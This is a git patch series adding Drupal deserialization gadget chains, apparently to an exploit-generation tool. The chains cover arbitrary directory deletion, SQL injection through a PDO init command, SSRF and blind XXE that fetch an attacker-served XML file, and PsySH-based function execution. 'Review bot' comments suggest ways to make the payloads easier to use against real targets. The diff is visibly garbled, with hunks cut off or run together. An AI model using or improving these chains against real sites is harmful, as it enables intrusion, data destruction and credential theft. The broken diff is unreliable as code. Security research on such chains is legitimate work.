From 614db9d029f7c12a8603ecf70a1b71a89b4730b4 Mon Sep 17 00:00:00 2001 From: mcdruid Date: Wed, 4 Dec 2024 16:03:52 +0000 Subject: [PATCH 1/5] rename directory --- gadgetchains/{Drupal9 => Drupal}/RCE/1/chain.php | 0 gadgetchains/{Drupal9 => Drupal}/RCE/1/gadgets.php | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename gadgetchains/{Drupal9 => Drupal}/RCE/1/chain.php (100%) rename gadgetchains/{Drupal9 => Drupal}/RCE/1/gadgets.php (100%) diff --git a/gadgetchains/Drupal9/RCE/1/chain.php b/gadgetchains/Drupal/RCE/1/chain.php similarity index 100% rename from gadgetchains/Drupal9/RCE/1/chain.php rename to gadgetchains/Drupal/RCE/1/chain.php diff --git a/gadgetchains/Drupal9/RCE/1/gadgets.php b/gadgetchains/Drupal/RCE/1/gadgets.php similarity index 100% rename from gadgetchains/Drupal9/RCE/1/gadgets.php rename to gadgetchains/Drupal/RCE/1/gadgets.php From b89a66a225a4ff661bee1e5c035f3001bf1b6189 Mon Sep 17 00:00:00 2001 From: mcdruid Date: Wed, 4 Dec 2024 17:09:47 +0000 Subject: [PATCH 2/5] Drupal/FD1 --- gadgetchains/Drupal/FD/1/chain.php | 20 ++++++++++++++++++++ gadgetchains/Drupal/FD/1/gadgets.php | 21 +++++++++++++++++++++ 2 files changed, 41 insertions(+) create mode 100644 gadgetchains/Drupal/FD/1/chain.php create mode 100644 gadgetchains/Drupal/FD/1/gadgets.php diff --git a/gadgetchains/Drupal/FD/1/chain.php b/gadgetchains/Drupal/FD/1/chain.php new file mode 100644 index 00000000..e94d0c2d --- /dev/null +++ b/gadgetchains/Drupal/FD/1/chain.php @@ -0,0 +1,20 @@ += 8.0.0 < 10.2.11 || >= 10.3.0 < 10.3.9 || >= 11.0.0 < 11.0.8'; + public static $vector = '__wakeup'; + public static $author = 'mcdruid'; + public static $information = 'See: https://www.drupal.org/sa-core-2024-006'; + + public function generate(array $parameters) + { + return new \Drupal\Core\Config\StorageComparer( + new \Drupal\Component\PhpStorage\FileStorage( + $parameters['remote_path'] + ) + ); + } +} 
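Review bot: `generate()` hands `$parameters['remote_path']` straight to `FileStorage::$directory`, so what the chain removes is whatever the real class's deletion routine does with that directory — presumably everything under it rather than a single file — and `$information` should say so before someone runs it with a broad path. Suggest `public static $information = 'See: https://www.drupal.org/sa-core-2024-006' . "\n" . 'remote_path is treated as a directory; the deletion applies to its contents, not to one file.';` once the exact sink in core's StorageComparer/FileStorage has been confirmed. The class header, including the `$parameters` declaration, is not visible in this hunk as rendered, so I cannot confirm that `remote_path` is declared there as a required parameter.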
diff --git a/gadgetchains/Drupal/FD/1/gadgets.php b/gadgetchains/Drupal/FD/1/gadgets.php new file mode 100644 index 00000000..378626f5 --- /dev/null +++ b/gadgetchains/Drupal/FD/1/gadgets.php @@ -0,0 +1,21 @@ +targetCacheStorage = $targetCacheStorage; + } + } +} + +namespace Drupal\Component\PhpStorage { + class FileStorage { + protected $directory; + public function __construct($directory) + { + $this->directory = $directory; + } + } +} \ No newline at end of file From c157d9d412ec45caa30f9f80aa4c884c15d0aeb4 Mon Sep 17 00:00:00 2001 From: mcdruid Date: Wed, 4 Dec 2024 17:10:40 +0000 Subject: [PATCH 3/5] Drupal SQLI1 and SSRF1 --- gadgetchains/Drupal/SQLI/1/chain.php | 28 ++++++++++++++++++++++++++ gadgetchains/Drupal/SQLI/1/gadgets.php | 3 +++ gadgetchains/Drupal/SSRF/1/chain.php | 27 +++++++++++++++++++++++++ gadgetchains/Drupal/SSRF/1/gadgets.php | 27 +++++++++++++++++++++++++ 4 files changed, 85 insertions(+) create mode 100644 gadgetchains/Drupal/SQLI/1/chain.php create mode 100644 gadgetchains/Drupal/SQLI/1/gadgets.php create mode 100644 gadgetchains/Drupal/SSRF/1/chain.php create mode 100644 gadgetchains/Drupal/SSRF/1/gadgets.php diff --git a/gadgetchains/Drupal/SQLI/1/chain.php b/gadgetchains/Drupal/SQLI/1/chain.php new file mode 100644 index 00000000..8cd6326a --- /dev/null +++ b/gadgetchains/Drupal/SQLI/1/chain.php 
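Review bot: The stub classes carry no comment tying them to the core code path they impersonate, so nobody can re-verify the chain against a later Drupal release without re-deriving it; each stub should name the real method that consumes its property. Above `protected $targetCacheStorage;` add `// the only property the real StorageComparer path needs to reach the delete; re-check against core when bumping $version`, and above `protected $directory;` add `// directory handed to FileStorage's delete routine — this is the remote_path parameter`. Separately, `class FileStorage {` puts the brace on the declaration line while the constructor below it uses the next-line form; PSR-12 wants `class FileStorage` with `{` on its own line. The opening of `StorageComparer` is missing from the hunk as rendered.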
@@ -0,0 +1,28 @@ += 8.0.0 < 10.2.11 || >= 10.3.0 < 10.3.9'; + public static $vector = '__wakeup'; + public static $author = 'mcdruid'; + public static $information = 'See: https://gist.github.com/paul-axe/2a384bb5f2d430dd3b63b2484af960f4 + See: https://www.drupal.org/sa-core-2024-008 + Drupal/SSRF1 can be used to extract db credentials for SQL injection.'; + + public function generate(array $parameters) + { + return new \Drupal\Core\Url( + new \Drupal\Core\Database\StatementPrefetch( + 'PDO', // class + [ + 'mysql:dbname=db;host=db', // DSN + 'db', // username + 'db', // password + [1002 => $parameters['sql']] // PDO::MYSQL_ATTR_INIT_COMMAND + ] + ) + ); + } +} diff --git a/gadgetchains/Drupal/SQLI/1/gadgets.php b/gadgetchains/Drupal/SQLI/1/gadgets.php new file mode 100644 index 00000000..0822e73f --- /dev/null +++ b/gadgetchains/Drupal/SQLI/1/gadgets.php @@ -0,0 +1,3 @@ += 8.0.0 < 10.2.11 || >= 10.3.0 < 10.3.9'; + public static $vector = '__wakeup'; + public static $author = 'mcdruid'; + public static $information = 'See: https://gist.github.com/paul-axe/2a384bb5f2d430dd3b63b2484af960f4 + See: https://www.drupal.org/sa-core-2024-008 + https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-exfiltrate-data-out-of-band'; + + public function generate(array $parameters) + { + return new \Drupal\Core\Url( + new \Drupal\Core\Database\StatementPrefetch( + 'SimpleXMLElement', + [ + $parameters['uri'], // e.g. 'http://10.11.12.13/xxe.xml' + LIBXML_BIGLINES | LIBXML_DTDLOAD | LIBXML_NOENT | LIBXML_PARSEHUGE, + true + ] + ) + ); + } +} diff --git a/gadgetchains/Drupal/SSRF/1/gadgets.php b/gadgetchains/Drupal/SSRF/1/gadgets.php new file mode 100644 index 00000000..8acce5c2 --- /dev/null +++ b/gadgetchains/Drupal/SSRF/1/gadgets.php 
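Review bot: The DSN and credentials are hard-coded in `generate()` as `'mysql:dbname=db;host=db'`, `'db'`, `'db'`, even though `$information` tells the user to extract the real credentials with Drupal/SSRF1 — there is no way to feed them in without editing the chain, so the payload only works against a DDEV-style default install. Read them from parameters with the current values as fallbacks: `$parameters['dsn'] ?? 'mysql:dbname=db;host=db'`, `$parameters['username'] ?? 'db'`, `$parameters['password'] ?? 'db'`, and declare the new keys in `$parameters` (which is outside the visible hunk; if the framework treats declared parameters as required, keep `sql` the only mandatory one and document the rest as editable defaults). Also worth a comment on the `1002` line: `PDO::MYSQL_ATTR_INIT_COMMAND` is honoured by the MySQL driver only, so against a PostgreSQL or SQLite site this chain executes nothing.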
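Review bot: The third constructor argument `true` is what turns `$parameters['uri']` from XML text into a location to fetch (SimpleXMLElement's `$data_is_url`), and `LIBXML_DTDLOAD | LIBXML_NOENT` is what makes external entities in the fetched document resolve — neither is commented, and the second is the only reason the blind-XXE link in `$information` applies. Annotate them: `true // data_is_url: fetch $uri instead of parsing it as XML` and `// DTDLOAD + NOENT: external entities in the fetched document are resolved, so the attacker-served XML can make the target issue further requests`. As rendered, this hunk runs from the `@@ -0,0 +1,3 @@` header of SQLI/1/gadgets.php straight into the SSRF chain body, so the SSRF chain.php file header and class declaration are not visible here.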
@@ -0,0 +1,27 @@ +_serviceIds = $serviceIds; + } + + } +} + +namespace Drupal\Core\Database { + class StatementPrefetch + { + protected $currentRow = array(); + protected $fetchStyle = 8; // PDO::FETCH_CLASS + protected $fetchOptions = array(); + + function __construct($class, $constructor_args) + { + $this->fetchOptions['class'] = $class; + $this->fetchOptions['constructor_args'] = $constructor_args; + } + } +} \ No newline at end of file From dbcbd64577dc1ee47ec47a7ae9bc560d1675f005 Mon Sep 17 00:00:00 2001 From: mcdruid Date: Fri, 25 Oct 2024 14:38:45 +0100 Subject: [PATCH 4/5] Drupal9/INFO1 --- gadgetchains/Drupal9/INFO/1/chain.php | 25 ++++++++++++ gadgetchains/Drupal9/INFO/1/gadgets.php | 51 +++++++++++++++++++++++++ 2 files changed, 76 insertions(+) create mode 100644 gadgetchains/Drupal9/INFO/1/chain.php create mode 100644 gadgetchains/Drupal9/INFO/1/gadgets.php diff --git a/gadgetchains/Drupal9/INFO/1/chain.php b/gadgetchains/Drupal9/INFO/1/chain.php new file mode 100644 index 00000000..112f25d6 --- /dev/null +++ b/gadgetchains/Drupal9/INFO/1/chain.php @@ -0,0 +1,25 @@ + TRUE, + 'storage' => 'frontpage', + 'current_display' => 'default', + 'args' => [], + 'current_page' => '', + 'exposed_input' => '', + 'exposed_data' => '', + 'exposed_raw_input' => '', + 'dom_id' => '', + ]; + public $built = TRUE; + public $live_preview = TRUE; + public $query; + public $displayHandlers; + public $display_handler; + + function __construct($query, $displayHandlers, $display_handler) { + $this->query = $query; + $this->displayHandlers = $displayHandlers; + $this->display_handler = $display_handler; + } + } + + class DisplayPluginCollection + { + + } +} + +namespace Drupal\views\Plugin\views\display { + class DefaultDisplay + { + + } +} + +namespace Psy { + class ExecutionClosure { + protected $closure; + + function __construct($closure) { + $this->closure = $closure; + } + } +} From af662bb391c2ea78b91bdc17a2f444f44737c741 Mon Sep 17 00:00:00 2001 
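Review bot: `function __construct($class, $constructor_args)` in `StatementPrefetch` has no visibility keyword, and the property defaults use `array()` while the chain files in the same commit use `[]`; both are style, but the gadget files are what people copy, so `public function __construct(...)`, `protected $currentRow = [];` and `protected $fetchOptions = [];` keep them consistent. The `8` is already annotated as `PDO::FETCH_CLASS`; a one-line note above `$this->fetchOptions['class'] = $class;` saying these two options are presumably what the real class feeds to its fetch-mode instantiation (`new $class(...$constructor_args)` — confirm against core) would make clear why an arbitrary class name plus constructor arguments is the whole gadget. The `Url` class header and most of its body are missing from the hunk as rendered.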
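Review bot: `function __construct($query, $displayHandlers, $display_handler)` in `ViewExecutable` and `function __construct($closure)` in `Psy\ExecutionClosure` carry no visibility keyword; make both `public function __construct(...)`. The empty `DisplayPluginCollection` and `DefaultDisplay` stubs need a one-line comment explaining they exist only so the serialized graph carries the class names the real code presumably type-checks — `// type placeholder only; the chain needs no state from this class` — otherwise they read as unfinished work. As rendered, the `@@ -0,0 +1,25 @@` header belongs to chain.php but the visible lines are gadgets.php content, so the chain body and the opening of `ViewExecutable` are missing here.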
From: mcdruid Date: Wed, 4 Dec 2024 17:17:28 +0000 Subject: [PATCH 5/5] Drupal/INFO1 --- gadgetchains/{Drupal9 => Drupal}/INFO/1/chain.php | 8 ++++---- gadgetchains/{Drupal9 => Drupal}/INFO/1/gadgets.php | 0 2 files changed, 4 insertions(+), 4 deletions(-) rename gadgetchains/{Drupal9 => Drupal}/INFO/1/chain.php (68%) rename gadgetchains/{Drupal9 => Drupal}/INFO/1/gadgets.php (100%) diff --git a/gadgetchains/Drupal9/INFO/1/chain.php b/gadgetchains/Drupal/INFO/1/chain.php similarity index 68% rename from gadgetchains/Drupal9/INFO/1/chain.php rename to gadgetchains/Drupal/INFO/1/chain.php index 112f25d6..8700ff9a 100644 --- a/gadgetchains/Drupal9/INFO/1/chain.php +++ b/gadgetchains/Drupal/INFO/1/chain.php @@ -1,14 +1,14 @@ = 8.0.0 < 10.2.11 || >= 10.3.0 < 10.3.9 || >= 11.0.0 < 11.0.8'; public static $vector = '__wakeup'; public static $author = 'mcdruid'; - public static $information = - 'This requires PsySH which is bundled with drush. It is common but not + public static $information = 'See: https://www.drupal.org/sa-core-2024-007 + This requires PsySH which is bundled with drush. It is common but not mandatory for drush to be installed along with Drupal core. Other PHP functions could be executed, but no parameters can be passed.'; diff --git a/gadgetchains/Drupal9/INFO/1/gadgets.php b/gadgetchains/Drupal/INFO/1/gadgets.php similarity index 100% rename from gadgetchains/Drupal9/INFO/1/gadgets.php rename to gadgetchains/Drupal/INFO/1/gadgets.php
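Review bot: The revised `$information` says PsySH "is bundled with drush", but the chain only fires if `Psy\ExecutionClosure` resolves in the web request's autoloader, which presumably requires drush to be a Composer dependency of the site rather than a global or phar install; a tester reading the current text will overestimate applicability. Extend the string, e.g. `It is common but not mandatory for drush to be installed along with Drupal core, and it must be in the site's own Composer autoloader (not a global install) for the class to resolve.` The default callable the chain executes and the rest of the class are outside this hunk, so I cannot check that the "no parameters can be passed" caveat matches what `generate()` builds.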